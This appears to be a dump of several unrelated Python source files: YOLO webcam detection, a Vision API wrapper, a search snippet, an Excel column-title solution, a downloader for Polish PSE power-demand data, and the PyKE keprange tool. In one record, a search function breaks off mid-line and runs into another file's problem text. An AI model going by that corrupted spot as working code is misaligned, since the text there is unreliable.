plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone',\n 'microwave', 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors', 'teddy bear',\n 'hair drier', 'toothbrush']\ncolors = [[random.randint(0, 255) for _ in range(3)] for _ in names]\nif __name__ == '__main__':\n isstop = True\n M = np.load('./transform/524-13/M.npy')\n # M = np.load('M.npy')\n cap = cv2.VideoCapture(0)\n cap_r = cv2.VideoCapture(1)\n t1 = time.time()\n # cap.set(cv2. CAP_PROP_FRAME_WIDTH, 2560)\n # cap.set(cv2. CAP_PROP_FRAME_HEIGHT, 1980)\n cap.set(cv2. CAP_PROP_FRAME_WIDTH, 1280)\n cap.set(cv2. CAP_PROP_FRAME_HEIGHT, 720)\n\n cap_r.set(cv2.CAP_PROP_FRAME_WIDTH, 320)\n cap_r.set(cv2.CAP_PROP_FRAME_HEIGHT, 240)\n \n model = detect_yolo()\n # print(22)\n # time.sleep(1)\n # imgs = cv2.imread(r'D:\\python\\yolov5_notebook\\yolov5-master\\yolov5-master\\data\\images/bus.jpg')\n # results = model.detect_yolo(imgs)\n # # gn = torch.tensor(imgs.shape)[[1, 0, 1, 0]]\n # if len(results):\n # print('sss1',results)\n # # print('len',len(results))\n # # print('results[-1]',results[:, -1])\n # # print('results[-1]',results[:, -1].unique())\n # for c in results[:, -1].unique():\n # n = (results[:, -1] == c).sum() # detections per class\n # s += f'{n} {names[int(c)]}s, ' # add to string\n # for *xyxy, conf, cls in reversed(results): \n # line = (cls, *xyxy, conf) \n # print(\"line\",line)\n # print(\"xyxy:\",xyxy)\n # label = f'{names[int(cls)]} {conf:.2f}'\n # plot_one_box(xyxy, imgs, label=label, color=colors[int(cls)], line_thickness=3)\n \n # cv2.imshow(\"show\", imgs)\n # if cv2.waitKey(1) == ord('q'): # q to quit\n # raise StopIteration \n # T = 0\n\n while(isstop):\n # 從攝影機擷取一張影像\n fps = cap.get(cv2.CAP_PROP_FPS)\n ret, frame = cap.read()\n ret_r, frame_r = cap_r.read()\n results = model.detect_yolo(frame)\n s = ''\n t2 =time.time()\n t_value = (t2 - t1)/10\n T = int(t_value % 7)\n if len(results):\n # print('sss1',results)\n # print('len',len(results))\n # print('results[-1]',results[:, -1])\n # print('results[-1]',results[:, -1].unique())\n for c in results[:, -1].unique():\n n = (results[:, -1] == c).sum() # detections per class\n s += f'{n} {names[int(c)]}s, ' # add to string\n for *xyxy, conf, cls in reversed(results): \n # line = (cls, *xyxy, conf) \n # print(\"line\",line)\n # print(\"xyxy:\",xyxy)\n center_ai = center(xyxy)\n label = f'{names[int(cls)]} {conf:.2f}'\n plot_one_box_fir(xyxy, frame, frame_r, M, T,label=label, color=colors[int(cls)], line_thickness=3)\n cv2.putText(frame, s, (0,20), cv2.FONT_HERSHEY_SIMPLEX , 1, (255, 0, 0), 2)\n cv2.imshow(\"show\", frame)\n if cv2.waitKey(1) == ord('q'): \n isstop = False\n break \n \n # 釋放攝影機\n cap.release()\n cap_r.release()\n # 關閉所有 OpenCV 視窗\n cv2.destroyAllWindows()\n","sub_path":"main_detect_yolo_fir.py","file_name":"main_detect_yolo_fir.py","file_ext":"py","file_size_in_byte":7002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"592333164","text":"import cv2\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom io import BytesIO\r\n\r\nfrom google.protobuf.json_format import MessageToJson\r\n\r\nclass VisionApiResponse:\r\n \r\n def __init__(self, response, type, content):\r\n self.__response = response\r\n self.type = type\r\n self.content = content\r\n\r\n def json(self):\r\n return MessageToJson(self.__response._pb)\r\n \r\n \r\n def result_content(self):\r\n return getattr(self, f'result_content_{self.type}')()\r\n \r\n \r\n def 
result_content_object_localization(self):\r\n # 画像をOpenCVで読み込む\r\n img = cv2.imdecode(np.frombuffer(self.content, np.uint8), cv2.IMREAD_UNCHANGED)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # BGR→RGBに変換\r\n \r\n img2 = img.copy()\r\n h, w = img2.shape[0:2]\r\n color = (255, 0, 0)\r\n font = cv2.FONT_HERSHEY_DUPLEX\r\n \r\n for obj in self.__response.localized_object_annotations:\r\n # バウンディングボックスの左上と右下の角の座標を取得して書き足す\r\n box = [(v.x * w, v.y * h) for v in obj.bounding_poly.normalized_vertices]\r\n\r\n cv2.rectangle(img2, tuple(map(int, box[0])), tuple(map(int, box[2])), color, 2)\r\n # オブジェクトの名前を取得して書き足す\r\n obname = obj.name\r\n cv2.putText(img2, obname ,tuple(map(int, box[3])), font, \r\n 1, color)\r\n \r\n img2 = Image.fromarray(img2)\r\n image_io = BytesIO()\r\n img2.save(image_io, format=\"JPEG\")\r\n return image_io\r\n \r\n","sub_path":"libs/gcp/vision/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"107219709","text":"def utilSequenceSearch(list,size,searchValue):\n for k in range(0,size):\n if searchValue==list[k]:\n return k\n return -1\n\ndef makeData(size):\n import random\n list=[]\n\n while len(list) A\n# 2 -> B\n# 3 -> C\n# ...\n# 26 -> Z\n# 27 -> AA\n# 28 -> AB\n# ...\n# Example 1:\n#\n# Input: 1\n# Output: \"A\"\n# Example 2:\n#\n# Input: 28\n# Output: \"AB\"\n# Example 3:\n#\n# Input: 701\n# Output: \"ZY\"\n\n# 思路方法\n#\n# 首先,我们要知道Excel里这个对应关系是什么样的。从A-Z对应1-26,当列标题进一位变成AA时,列对应的数字变成27。\n# 所以这个题本质上是一个10进制转26进制的问题,不过A对应的是1而不是0,要注意。\n#\n# 思路一\n#\n# 用处理进制转换的一般思路,重复取模和除法即可。但是注意由于A对应1,所以Z之后是AA,这个转换不同于一般的进制转换。\n\nclass Solution:\n def convertToTitle(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n res=''\n while n:\n res=chr((n-1)%26+65)+res\n n=(n-1)//26\n return res\n","sub_path":"src/168_Excel_Sheet_Column_Title.py","file_name":"168_Excel_Sheet_Column_Title.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"160191034","text":"from datetime import datetime as dt\r\nimport pandas as pd\r\nfrom urllib import error as httperr\r\n\r\nzmiany_czasu = []\r\nlista_bledow = []\r\n\r\n'''\r\nBrakuje godzin przy zmianie czasu z zimowego na letni!!!\r\n'''\r\n\r\n\r\n# WPKD\r\n\r\ndef wpkd(data_od, data_do):\r\n nazwa_pliku = 'wpkd.xlsx'\r\n adres = 'https://www.pse.pl/getcsv/-/export/csv/WPKD/data/'\r\n tabela_wpkd = pd.DataFrame(columns=['Data', 'Godzina', 'WPKD'])\r\n okres = pd.date_range(data_od, data_do)\r\n for data in okres:\r\n plik = adres + data.strftime('%Y%m%d')\r\n try:\r\n wpkd_dzien = pd.read_csv(plik, encoding='ISO-8859-1', sep=';', usecols=[0, 1, 2], parse_dates=[0])\r\n except httperr.HTTPError as error:\r\n print('---------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(WPKD) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n wpkd_dzien.rename(index=str, columns={'Krajowe zapotrzebowanie na moc': 'WPKD'}, inplace=True)\r\n try:\r\n wpkd_dzien['Godzina'] = wpkd_dzien['Godzina'].astype(int)\r\n except ValueError:\r\n wpkd_dzien['Godzina'] = pd.to_numeric(wpkd_dzien['Godzina'], errors='coerce')\r\n wpkd_dzien.dropna(axis=0, how='any', inplace=True)\r\n wpkd_dzien['Godzina'] = wpkd_dzien['Godzina'].astype(int)\r\n print('---------')\r\n print('Zmiana czasu - usunięto godzinę 2A')\r\n zmiany_czasu.append('(WPKD) Zmiana czasu - usunięto godzinę 2A 
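Annotation: in the Vision API record above, `bounding_poly.normalized_vertices` holds corner coordinates as fractions of the image size, ordered so that index 0 is the top-left and index 2 the bottom-right corner, which is exactly how the record feeds `cv2.rectangle`. The denormalization step in isolation:

```python
def to_pixel_box(normalized_vertices, width, height):
    # Vision API vertices are in [0, 1]; scale by the real image dimensions.
    pts = [(int(v.x * width), int(v.y * height)) for v in normalized_vertices]
    return pts[0], pts[2]   # (top-left, bottom-right) for cv2.rectangle
```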
dla daty: ' + data.strftime('%Y-%m-%d'))\r\n try:\r\n tabela_wpkd = pd.merge(tabela_wpkd, wpkd_dzien, how='outer')\r\n print('(WPKD) ' + data.strftime('%Y-%m-%d'))\r\n except BaseException as error:\r\n print('-----------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(WPKD) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n tabela_wpkd.to_excel(nazwa_pliku)\r\n return tabela_wpkd\r\n\r\n\r\n# PKD\r\n\r\ndef pkd(data_od, data_do):\r\n nazwa_pliku = 'pkd.xlsx'\r\n adres = 'https://www.pse.pl/getcsv/-/export/csv/PKD/data/'\r\n tabela_pkd = pd.DataFrame(columns=['Data', 'Godzina', 'PKD'])\r\n okres = pd.date_range(data_od, data_do)\r\n for data in okres:\r\n plik = adres + data.strftime('%Y%m%d')\r\n try:\r\n pkd_dzien = pd.read_csv(plik, encoding='ISO-8859-1', sep=';', usecols=[0, 1, 2], parse_dates=[0])\r\n except httperr.HTTPError as error:\r\n print('---------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(PKD) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n pkd_dzien.rename(index=str, columns={'Krajowe zapotrzebowanie na moc': 'PKD'}, inplace=True)\r\n try:\r\n pkd_dzien['Godzina'] = pkd_dzien['Godzina'].astype(int)\r\n except ValueError:\r\n pkd_dzien['Godzina'] = pd.to_numeric(pkd_dzien['Godzina'], errors='coerce')\r\n pkd_dzien.dropna(axis=0, how='any', inplace=True)\r\n pkd_dzien['Godzina'] = pkd_dzien['Godzina'].astype(int)\r\n print('---------')\r\n print('Zmiana czasu - usunięto godzinę 2A')\r\n zmiany_czasu.append('(PKD) Zmiana czasu - usunięto godzinę 2A dla daty: ' + data.strftime('%Y-%m-%d'))\r\n try:\r\n tabela_pkd = pd.merge(tabela_pkd, pkd_dzien, how='outer')\r\n print('(PKD) ' + data.strftime('%Y-%m-%d'))\r\n except BaseException as error:\r\n print('-----------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(PKD) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n tabela_pkd.to_excel(nazwa_pliku)\r\n return tabela_pkd\r\n\r\n\r\n# BPKD\r\n\r\ndef bpkd(data_od, data_do):\r\n nazwa_pliku = 'bpkd.xlsx'\r\n adres = 'https://www.pse.pl/getcsv/-/export/csv/BPKD/data/'\r\n tabela_bpkd = pd.DataFrame(columns=['Data', 'Godzina', 'BPKD'])\r\n okres = pd.date_range(data_od, data_do)\r\n for data in okres:\r\n plik = adres + data.strftime('%Y%m%d')\r\n try:\r\n bpkd_dzien = pd.read_csv(plik, encoding='ISO-8859-1', sep=';', usecols=[0, 1, 2], parse_dates=[0])\r\n except httperr.HTTPError as error:\r\n print('---------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(BPKD) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n bpkd_dzien.rename(index=str, columns={'Krajowe zapotrzebowanie na moc': 'BPKD'}, inplace=True)\r\n try:\r\n bpkd_dzien['Godzina'] = bpkd_dzien['Godzina'].astype(int)\r\n except ValueError:\r\n bpkd_dzien['Godzina'] = pd.to_numeric(bpkd_dzien['Godzina'], errors='coerce')\r\n bpkd_dzien.dropna(axis=0, how='any', inplace=True)\r\n bpkd_dzien['Godzina'] = bpkd_dzien['Godzina'].astype(int)\r\n print('---------')\r\n print('Zmiana czasu - usunięto godzinę 2A')\r\n zmiany_czasu.append('(BPKD) Zmiana czasu - usunięto godzinę 2A dla daty: ' + data.strftime('%Y-%m-%d'))\r\n try:\r\n tabela_bpkd = pd.merge(tabela_bpkd, bpkd_dzien, how='outer')\r\n print('(BPKD) ' + data.strftime('%Y-%m-%d'))\r\n except BaseException as error:\r\n 
print('-----------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(BPKD) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n tabela_bpkd.to_excel(nazwa_pliku)\r\n return tabela_bpkd\r\n\r\n\r\n# WYK KSE\r\n\r\ndef wyk(data_od, data_do):\r\n nazwa_pliku = 'wyk.xlsx'\r\n adres = 'https://www.pse.pl/getcsv/-/export/csv/WYK_KSE/data/'\r\n tabela_wyk = pd.DataFrame(columns=['Data', 'Godzina', 'Wykonanie KSE'])\r\n okres = pd.date_range(data_od, data_do)\r\n for data in okres:\r\n plik = adres + data.strftime('%Y%m%d')\r\n try:\r\n wyk_dzien = pd.read_csv(plik, encoding='ISO-8859-1', sep=';', usecols=[0, 1, 2], parse_dates=[0], decimal=',')\r\n except httperr.HTTPError as error:\r\n print('---------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(WYK) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n wyk_dzien.rename(index=str, columns={'Krajowe zapotrzebowanie na moc': 'Wykonanie KSE'}, inplace=True)\r\n try:\r\n wyk_dzien['Godzina'] = wyk_dzien['Godzina'].astype(int)\r\n except ValueError:\r\n wyk_dzien['Godzina'] = pd.to_numeric(wyk_dzien['Godzina'], errors='coerce')\r\n wyk_dzien.dropna(axis=0, how='any', inplace=True)\r\n wyk_dzien['Godzina'] = wyk_dzien['Godzina'].astype(int)\r\n print('---------')\r\n print('Zmiana czasu - usunięto godzinę 2A')\r\n zmiany_czasu.append('(WYK) Zmiana czasu - usunięto godzinę 2A dla daty: ' + data.strftime('%Y-%m-%d'))\r\n try:\r\n tabela_wyk = pd.merge(tabela_wyk, wyk_dzien, how='outer')\r\n print('(WYK) ' + data.strftime('%Y-%m-%d'))\r\n except BaseException as error:\r\n print('-----------')\r\n print('Błąd')\r\n print(data.strftime('%Y-%m-%d'))\r\n print(error)\r\n lista_bledow.append('(WYK) Błąd dla daty: ' + data.strftime('%Y-%m-%d') + ' - ' + str(error))\r\n continue\r\n tabela_wyk.to_excel(nazwa_pliku)\r\n return tabela_wyk\r\n\r\n\r\n# Złącz do sumarycznego arkusza\r\n\r\ndef polacz_arkusze():\r\n sciezka_plikow = ''\r\n zapotrzebowanie = pd.DataFrame(columns=['Data', 'Godzina'])\r\n try:\r\n wpkd_dane = pd.read_excel(sciezka_plikow + 'wpkd.xlsx')\r\n zapotrzebowanie = pd.merge(zapotrzebowanie, wpkd_dane, how='outer')\r\n except FileNotFoundError:\r\n print('Pominięto WPKD - brak pliku!')\r\n try:\r\n pkd_dane = pd.read_excel(sciezka_plikow + 'pkd.xlsx')\r\n zapotrzebowanie = pd.merge(zapotrzebowanie, pkd_dane, how='outer')\r\n except FileNotFoundError:\r\n print('Pominięto PKD - brak pliku!')\r\n try:\r\n bpkd_dane = pd.read_excel(sciezka_plikow + 'bpkd.xlsx')\r\n zapotrzebowanie = pd.merge(zapotrzebowanie, bpkd_dane, how='outer')\r\n except FileNotFoundError:\r\n print('Pominięto BPKD - brak pliku!')\r\n try:\r\n wyk_dane = pd.read_excel(sciezka_plikow + 'wyk.xlsx')\r\n zapotrzebowanie = pd.merge(zapotrzebowanie, wyk_dane, how='outer')\r\n except FileNotFoundError:\r\n print('Pominięto WYK - brak pliku!')\r\n zapotrzebowanie.sort_values(by=['Data', 'Godzina'], ascending=True, inplace=True)\r\n zapotrzebowanie.to_excel('Zapotrzebowanie_Plan_Wykonanie.xlsx')\r\n return zapotrzebowanie\r\n\r\n\r\n# Wykonanie kodu\r\n\r\n# wpkd = wpkd(dt(2009, 1, 1), dt(2018, 12, 31))\r\n# pkd = pkd(dt(2009, 1, 1), dt(2018, 12, 31))\r\n# bpkd = bpkd(dt(2012, 1, 1), dt(2018, 12, 31))\r\n# wyk = wyk(dt(2009, 1, 1), dt(2018, 12, 31))\r\n\r\n\r\npolacz_arkusze()\r\n\r\nprint('Zmiany czasu: ')\r\nfor i in zmiany_czasu:\r\n print(i)\r\n\r\nprint('-------------')\r\nprint('Lista błędów: ')\r\nfor i in 
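Annotation: the four download functions in the PSE record above (`wpkd`, `pkd`, `bpkd`, `wyk`) differ only in the URL segment, the output column name, and the decimal separator, so they collapse into one parameterized fetcher. A hedged sketch, assuming the pse.pl CSV endpoint behaves as it does in the record; the per-day error logging is trimmed for brevity:

```python
import pandas as pd

def fetch_pse(kind, column_name, date_from, date_to, decimal='.'):
    """Download one PSE CSV per day and concatenate; `kind` is the URL
    segment such as 'WPKD', 'PKD', 'BPKD' or 'WYK_KSE'."""
    frames = []
    for day in pd.date_range(date_from, date_to):
        url = f'https://www.pse.pl/getcsv/-/export/csv/{kind}/data/{day:%Y%m%d}'
        df = pd.read_csv(url, encoding='ISO-8859-1', sep=';',
                         usecols=[0, 1, 2], parse_dates=[0], decimal=decimal)
        df = df.rename(columns={'Krajowe zapotrzebowanie na moc': column_name})
        # Coerce the hour column; the '2A' daylight-saving row becomes NaN and is dropped.
        df['Godzina'] = pd.to_numeric(df['Godzina'], errors='coerce')
        frames.append(df.dropna())
    return pd.concat(frames, ignore_index=True)
```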
lista_bledow:\r\n print(i)\r\n\r\n","sub_path":"Zapotrzebowanie_KSE.py","file_name":"Zapotrzebowanie_KSE.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"177398441","text":"from .utils import PyKEArgumentHelpFormatter\r\nfrom . import kepio, kepmsg, kepkey\r\nimport numpy as np\r\nfrom astropy.io import fits as pyfits\r\nfrom matplotlib import pyplot as plt\r\n\r\n# global variables\r\n\r\ninstr = ''; cadence = 1800.0; barytime0 = 0\r\nnrm = 1; barytime = []; flux = []; xmin = 0; xmax = 1\r\nymin = 0; ymax = 1; xr = 1; yr = 1; xlab = ''; ylab = ''\r\nmask = []; aid = None; bid = None; cid = None; did = None; eid = None; fid = None\r\nclobb = True; outf = ''; verb = True; logf = ''; rinf = ''\r\n\r\n\r\n__all__ = ['keprange']\r\n\r\n\r\ndef keprange(infile, outfile=None, datacol='SAP_FLUX', rinfile='',\r\n overwrite=False, verbose=False, logfile='keprange.log'):\r\n \"\"\"\r\n keprange -- Define time ranges interactively for use with other PyKE tasks.\r\n\r\n A number of PyKE tasks, e.g. kepdetrend, kepoutlier, require the user to\r\n specify ranges in time over which to operate. keprange provides a visual\r\n and interactive tool with which to define time ranges and store them within\r\n an ASCII file. Choices are made using a GUI. Use the left-button of your\r\n mouse to select ranges. An existing ASCII file can be loaded, a new ASCII\r\n file can be written, the list of times can be cleared or printed using the\r\n buttons on the GUI.\r\n\r\n Parameters\r\n ----------\r\n infile : str\r\n The name of a MAST standard format FITS file containing a Kepler light\r\n curve within the first data extension.\r\n outfile : str\r\n The name of the output ASCII file storing time ranges for future use in\r\n other PyKE tools.\r\n rinfile : str\r\n An existing ASCII file containing time ranges in Barycentric Julian\r\n Date (BJD) can be uploaded into the task. This can be used as a basis\r\n for a new set of time ranges. This argument is optional and is not\r\n prompted for automatically. If no ascii file will be input then\r\n rinfile=None will clear the argument buffer after a previous use.\r\n datacol : str\r\n The datacol name containing data stored within extension 1 of infile.\r\n This data will be plotted against time so that the user can choose\r\n appropriate time ranges.\r\n overwrite : bool\r\n Overwrite the output file?\r\n verbose : bool\r\n Print informative messages and warnings to the shell and logfile?\r\n logfile : str\r\n Name of the logfile containing error and warning messages.\r\n\r\n Examples\r\n --------\r\n .. code-block:: bash\r\n\r\n $ keprange kplr002436324-2009259160929_llc.fits --verbose\r\n\r\n .. 
image:: ../_static/images/api/keprange.png\r\n :align: center\r\n \"\"\"\r\n\r\n if outfile is None:\r\n outfile = infile.split('.')[0] + \"-{}.txt\".format(__all__[0])\r\n\r\n # startup parameters\r\n global instr, cadence, barytime0, nrm, barytime, flux\r\n global xmin, xmax, ymin, ymax, xr, yr, xlab, ylab\r\n global clobb, outf, verb, logf, rinf, col, bjdref, cade\r\n\r\n # log the call\r\n hashline = '--------------------------------------------------------------'\r\n kepmsg.log(logfile, hashline, verbose)\r\n call = ('KEPRANGE -- '\r\n + ' infile={}'.format(infile)\r\n + ' outfile={}'.format(outfile)\r\n + ' rinfile={}'.format(rinfile)\r\n + ' datacol={}'.format(datacol)\r\n + ' overwrite={}'.format(overwrite)\r\n + ' verbose={}'.format(verbose)\r\n + ' logfile={}'.format(logfile))\r\n kepmsg.log(logfile, call+'\\n', verbose)\r\n clobb = overwrite\r\n outf = outfile\r\n verb = verbose\r\n logf = logfile\r\n rinf = rinfile\r\n\r\n # start time\r\n kepmsg.clock('KEPRANGE started at: ', logfile, verbose)\r\n\r\n # overwrite output file\r\n if overwrite:\r\n kepio.overwrite(outfile, logfile, verbose)\r\n if kepio.fileexists(outfile):\r\n errmsg = 'ERROR -- KEPRANGE: {} exists. Use --overwrite'.format(outfile)\r\n kepmsg.err(logfile, errmsg, verbose)\r\n\r\n ## open input file\r\n instr = pyfits.open(infile, 'readonly')\r\n tstart, tstop, bjdref, cadence = kepio.timekeys(instr, infile,\r\n logfile, verbose)\r\n try:\r\n work = instr[0].header['FILEVER']\r\n cadenom = 1.0\r\n except:\r\n cadenom = cadence\r\n cade = cadenom\r\n\r\n # fudge non-compliant FITS keywords with no values\r\n instr = kepkey.emptykeys(instr, infile, logfile, verbose)\r\n # input data\r\n table = instr[1].data\r\n\r\n # filter out NaNs\r\n work1 = []; work2 = []\r\n col = datacol\r\n barytime = kepio.readtimecol(infile, table, logfile, verbose)\r\n try:\r\n flux = instr[1].data.field(col)\r\n except:\r\n errmsg = ('ERROR -- KEPRANGE: no datacol named {} in table {} [1]'\r\n .format(col, infile))\r\n kepmsg.err(infile, message, verbose)\r\n for i in range(len(barytime)):\r\n if (np.isfinite(barytime[i]) and np.isfinite(flux[i])\r\n and flux[i] != 0.0):\r\n work1.append(barytime[i] + bjdref)\r\n work2.append(flux[i])\r\n barytime = np.array(work1, dtype=np.float64)\r\n flux = np.array(work2, dtype=np.float32) / cadenom\r\n\r\n # clean up x-axis unit\r\n barytime0 = float(int(tstart / 100) * 100.0)\r\n barytime = barytime - barytime0\r\n xlab = 'BJD $-$ {}'.format(barytime0)\r\n\r\n # clean up y-axis units\r\n nrm = len(str(int(flux.max()))) - 1\r\n flux = flux / 10 ** nrm\r\n ylab = '10$^%d$ e$^-$ s$^{-1}$' % nrm\r\n\r\n # data limits\r\n xmin = barytime.min()\r\n xmax = barytime.max()\r\n ymin = flux.min()\r\n ymax = flux.max()\r\n xr = xmax - xmin\r\n yr = ymax - ymin\r\n flux[0] = 0.0\r\n flux[-1] = 0.0\r\n\r\n # plot new light curve\r\n plt.rcParams['figure.dpi'] = 80\r\n plt.figure(figsize=[17, 7])\r\n plotlc()\r\n\r\n\r\ndef plotlc():\r\n global aid, bid, cid, did, eid, fid, mask\r\n\r\n # load button\r\n plt.clf()\r\n plt.axes([0.06, 0.02, 0.22, 0.1])\r\n plt.text(0.5, 0.5, 'LOAD', fontsize=24, weight='heavy',\r\n horizontalalignment='center', verticalalignment='center')\r\n plt.setp(plt.gca(), xticklabels=[], xticks=[], yticklabels=[], yticks=[])\r\n plt.fill([0.0, 1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0, 0.0], '#ffffee')\r\n plt.xlim(0.0, 1.0)\r\n plt.ylim(0.0, 1.0)\r\n aid = plt.connect('button_press_event', clicker1)\r\n\r\n # save button\r\n plt.axes([0.2933, 0.02, 0.22, 0.1])\r\n plt.text(0.5, 0.5, 
'SAVE', fontsize=24, weight='heavy',\r\n horizontalalignment='center', verticalalignment='center')\r\n plt.setp(plt.gca(), xticklabels=[], xticks=[], yticklabels=[], yticks=[])\r\n plt.fill([0.0, 1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0, 0.0], '#ffffee')\r\n plt.xlim(0.0, 1.0)\r\n plt.ylim(0.0, 1.0)\r\n bid = plt.connect('button_press_event', clicker2)\r\n\r\n # clear button\r\n plt.axes([0.5266, 0.02, 0.22, 0.1])\r\n plt.text(0.5, 0.5, 'CLEAR', fontsize=24, weight='heavy',\r\n horizontalalignment='center', verticalalignment='center')\r\n plt.setp(plt.gca(), xticklabels=[], xticks=[], yticklabels=[], yticks=[])\r\n plt.fill([0.0, 1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0, 0.0], '#ffffee')\r\n plt.xlim(0.0, 1.0)\r\n plt.ylim(0.0, 1.0)\r\n cid = plt.connect('button_press_event', clicker3)\r\n\r\n # print button\r\n plt.axes([0.76, 0.02, 0.22, 0.1])\r\n plt.text(0.5, 0.5, 'PRINT', fontsize=24, weight='heavy',\r\n horizontalalignment='center', verticalalignment='center')\r\n plt.setp(plt.gca(), xticklabels=[], xticks=[], yticklabels=[], yticks=[])\r\n plt.fill([0.0, 1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0, 0.0], '#ffffee')\r\n plt.xlim(0.0, 1.0)\r\n plt.ylim(0.0, 1.0)\r\n did = plt.connect('button_press_event', clicker4)\r\n\r\n # light curve\r\n plt.axes([0.06, 0.213, 0.92, 0.77])\r\n plt.gca().xaxis.set_major_formatter(plt.ScalarFormatter(useOffset=False))\r\n plt.gca().yaxis.set_major_formatter(plt.ScalarFormatter(useOffset=False))\r\n ltime = []; ldata = []\r\n work1 = instr[1].data.field(0) + bjdref\r\n work2 = instr[1].data.field(col) / cade\r\n for i in range(len(work1)):\r\n if np.isfinite(work1[i]) or np.isfinite(work2[i]):\r\n ltime.append(work1[i])\r\n ldata.append(work2[i])\r\n else:\r\n ltime = np.array(ltime, dtype=np.float64) - barytime0\r\n ldata = np.array(ldata, dtype=np.float64) / 10 ** nrm\r\n plt.plot(ltime,ldata,color='#0000ff',linestyle='-',linewidth=1.0)\r\n ltime = []; ldata = []\r\n ltime = np.array(ltime, dtype=np.float64) - barytime0\r\n ldata = np.array(ldata, dtype=np.float64) / 10 ** nrm\r\n plt.plot(ltime, ldata, color='#0000ff', linestyle='-', linewidth=1.0)\r\n plt.fill(barytime, flux, fc='#ffff00', linewidth=0.0, alpha=0.2)\r\n plt.xlabel(xlab, {'color' : 'k'})\r\n plt.ylabel(ylab, {'color' : 'k'})\r\n plt.grid()\r\n\r\n # plt.plot masks\r\n for i in range(len(mask)):\r\n t = float(mask[i])\r\n plt.plot([t, t], [ymin, ymax], color='g', linestyle='-', linewidth=0.5)\r\n nt = 0\r\n for i in range(int(len(mask) / 2)):\r\n t1 = float(mask[nt])\r\n t2 = float(mask[nt + 1])\r\n nt += 2\r\n plt.fill([t1, t1, t2, t2, t1], [ymin, ymax, ymax, ymin, ymin],\r\n fc='g', linewidth=0.0, alpha=0.5)\r\n # plot ranges\r\n plt.xlim(xmin - xr * 0.01, xmax + xr * 0.01)\r\n if ymin - yr * 0.01 <= 0.0:\r\n plt.ylim(1.0e-10, ymax + yr * 0.01)\r\n else:\r\n plt.ylim(ymin - yr * 0.01, ymax + yr * 0.01)\r\n\r\n # ranges\r\n eid = plt.connect('button_press_event', clicker6)\r\n\r\n # render plot\r\n plt.show()\r\n\r\ndef clicker1(event):\r\n\r\n global mask, aid, bid, cid, did, eid, fid\r\n\r\n if event.inaxes:\r\n if event.button == 1:\r\n if (event.x > 83 and event.x < 383 and\r\n event.y > 12 and event.y < 68):\r\n if kepio.fileexists(rinf):\r\n mask = []\r\n lines = kepio.openascii(rinf, 'r', logf, verb)\r\n for line in lines:\r\n line = line.strip().split(',')\r\n try:\r\n float(line[0])\r\n float(line[1])\r\n if barytime0 > 2.4e6:\r\n mask.append(float(line[0]) - barytime0)\r\n mask.append(float(line[1]) - barytime0)\r\n else:\r\n mask.append(float(line[0]) - barytime0 - 
2.4e6)\r\n mask.append(float(line[1]) - barytime0 - 2.4e6)\r\n except:\r\n message = 'ERROR -- KEPRANGE: ascii format of ranges '\r\n message += 'file not recognized.'\r\n kepmsg.err(logf, message, False)\r\n plt.disconnect(aid)\r\n plt.disconnect(bid)\r\n plt.disconnect(cid)\r\n plt.disconnect(did)\r\n plt.disconnect(eid)\r\n plt.disconnect(fid)\r\n plotlc()\r\n else:\r\n print('WARNING -- KEPRANGE: input ranges file does not'\r\n ' exist or was not provided')\r\n return\r\n\r\n# -----------------------------------------------------------\r\n# save mask to ascii file\r\n\r\ndef clicker2(event):\r\n\r\n global mask, aid, bid, cid, did, eid, fid, clobb\r\n\r\n if clobb:\r\n kepio.overwrite(outf, logf, verb)\r\n if kepio.fileexists(outf):\r\n message = 'ERROR -- KEPRANGE: {} exists. Use --overwrite'.format(outf)\r\n kepmsg.err(logf, message, verb)\r\n else:\r\n if event.inaxes:\r\n if event.button == 1:\r\n if (event.x > 402 and event.x < 702 and\r\n event.y > 12 and event.y < 68):\r\n nt = 0; txt = ''\r\n for i in range(int(len(mask)/2)):\r\n t1 = float(mask[nt]) + barytime0\r\n t2 = float(mask[nt+1]) + barytime0\r\n if t1 < 2.4e6: t1 += 2.4e6\r\n if t2 